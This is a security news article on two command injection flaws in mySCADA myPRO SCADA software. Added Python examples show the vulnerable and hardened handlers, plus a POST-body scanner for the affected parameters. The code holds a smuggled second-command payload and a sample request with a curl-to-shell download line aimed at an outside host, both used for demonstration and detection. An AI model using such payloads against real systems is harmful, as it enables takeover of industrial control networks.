
Mar 19, 2025 | Ravie Lakshmanan | Vulnerability / Network Security

Cybersecurity researchers have disclosed details of two critical vulnerabilities in mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments. Both flaws could allow an attacker to take control of vulnerable systems.

According to Swiss security company PRODAFT, exploiting them could give an attacker unauthorized access to industrial control networks, resulting in significant operational disruption and financial loss.

The following are the vulnerabilities, both of which have a CVSS v4 score of 9.3:

  • CVE-2025-20014 – An operating system command injection vulnerability that could allow an attacker to execute arbitrary commands on the affected system by sending a specially crafted POST request containing a version parameter.
  • CVE-2025-20061 – An operating system command injection vulnerability that could allow an attacker to execute arbitrary commands on the affected system by sending a specially crafted POST request containing an email parameter.

Successful exploitation of either vulnerability allows an attacker to execute arbitrary operating system commands, and therefore arbitrary code, on the affected host. The issues have been addressed in the following versions:

  • mySCADA PRO Manager 1.3
  • mySCADA PRO Runtime 9.2.1

PRODAFT notes that both vulnerabilities stem from a failure to properly sanitize user-supplied input before it is used to build operating system commands, which is what makes it possible for attackers to inject commands of their own.
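The bug class described above (untrusted POST parameter interpolated into an OS command) is easy to reproduce and to fix. The following is an added example and is not mySCADA's code: it assumes a hypothetical report handler that shells out to a mailer with the address from an "email" parameter, with /bin/echo standing in for the mailer so the example runs offline. The same pattern applies to the "version" parameter in CVE-2025-20014. The hardened variant shows the two defenses that matter: an allow-list check on the value, and passing it as a single argv element with no shell involved.

```python
import re
import subprocess

# Strict allow-list for the value; anything with shell metacharacters fails here.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def send_report_vulnerable(email: str) -> str:
    """Interpolates untrusted input into a shell command line (the bug pattern)."""
    cmd = f"echo sending report to {email}"          # email comes straight from the POST body
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def send_report_no_shell(email: str) -> str:
    """No validation, but no shell either: metacharacters are passed literally as one argument."""
    result = subprocess.run(["echo", "sending report to", email],
                            capture_output=True, text=True, check=True)
    return result.stdout


def send_report_hardened(email: str) -> str:
    """Allow-list the value first, then pass it as a single argv element."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("invalid email address")
    return send_report_no_shell(email)


def run_demo() -> dict:
    """Exercise all three handlers with a benign value and a constructed attacker payload."""
    benign = "ops@example.com"
    payload = "ops@example.com; echo INJECTED"       # constructed attacker input, not a real request
    out = {
        "vuln_benign": send_report_vulnerable(benign),
        "vuln_payload": send_report_vulnerable(payload),   # second command actually runs
        "noshell_payload": send_report_no_shell(payload),  # ';' and 'echo' are inert text
        "hard_benign": send_report_hardened(benign),
    }
    try:
        send_report_hardened(payload)
        out["hard_payload"] = "accepted"
    except ValueError:
        out["hard_payload"] = "rejected"
    return out


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

In the vulnerable handler the payload's second command executes and its output appears on its own line; in the argv-based handler the same bytes are printed verbatim as part of a single argument, and the hardened handler rejects them outright. Validation alone is a weaker defense than dropping the shell, because every new parameter needs its own correct allow-list; doing both is the robust choice.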

According to the company, “These vulnerabilities highlight the ongoing security risks in SCADA systems and the need for more robust defenses. Exploitation could lead to operational disruptions, financial losses, and safety hazards.”

Organizations are advised to apply the latest patches, segment the network so that SCADA systems are isolated from IT networks, enforce strong authentication, and monitor for suspicious activity.
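Until the patch is applied, the "monitor for suspicious activity" advice can be made concrete by inspecting POST bodies for the two parameters named in the advisory. The following is an added example, not a PRODAFT or mySCADA tool: it parses URL-encoded form bodies (constructed sample traffic, not real myPRO requests) and flags any "email" or "version" value carrying shell metacharacters or command substitution. It is a coarse heuristic suited to a WAF rule or a log-review script, not a replacement for patching.

```python
from urllib.parse import parse_qs

# Characters that let a value break out of a shell command: separators, pipes,
# redirection, backticks, variable expansion and embedded newlines.
SHELL_META = set(";|&`$<>\n")
# Parameters named in CVE-2025-20061 (email) and CVE-2025-20014 (version).
WATCHED_PARAMS = ("email", "version")


def suspicious_params(body: str) -> list:
    """Return (param, decoded_value) pairs for watched parameters that look like injection attempts."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            if any(ch in SHELL_META for ch in value) or "$(" in value:
                hits.append((name, value))
    return hits


# Constructed sample POST bodies as they would appear URL-encoded on the wire.
SAMPLE_POSTS = [
    "email=ops%40example.com&format=pdf",                                      # benign
    "email=ops%40example.com%3Bcurl+http%3A%2F%2F203.0.113.5%2Fx%7Csh",         # ';' and '|' injected
    "version=9.2.0",                                                           # benign
    "version=9.2.0%60id%60",                                                   # backtick substitution
    "comment=fine%3B+really",                                                  # metachar in an unwatched param
]


def scan(posts: list) -> list:
    """Return (index, hits) for every body with at least one suspicious watched parameter."""
    findings = []
    for i, body in enumerate(posts):
        hits = suspicious_params(body)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_POSTS):
        print(f"request {index}: {hits}")
```

Decoding before matching matters: the injected ";" arrives as "%3B" and a naive regex over the raw body would miss it. Restricting the check to the two named parameters keeps false positives down, but a broader rule covering every parameter is reasonable on a host that must stay unpatched for a while.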
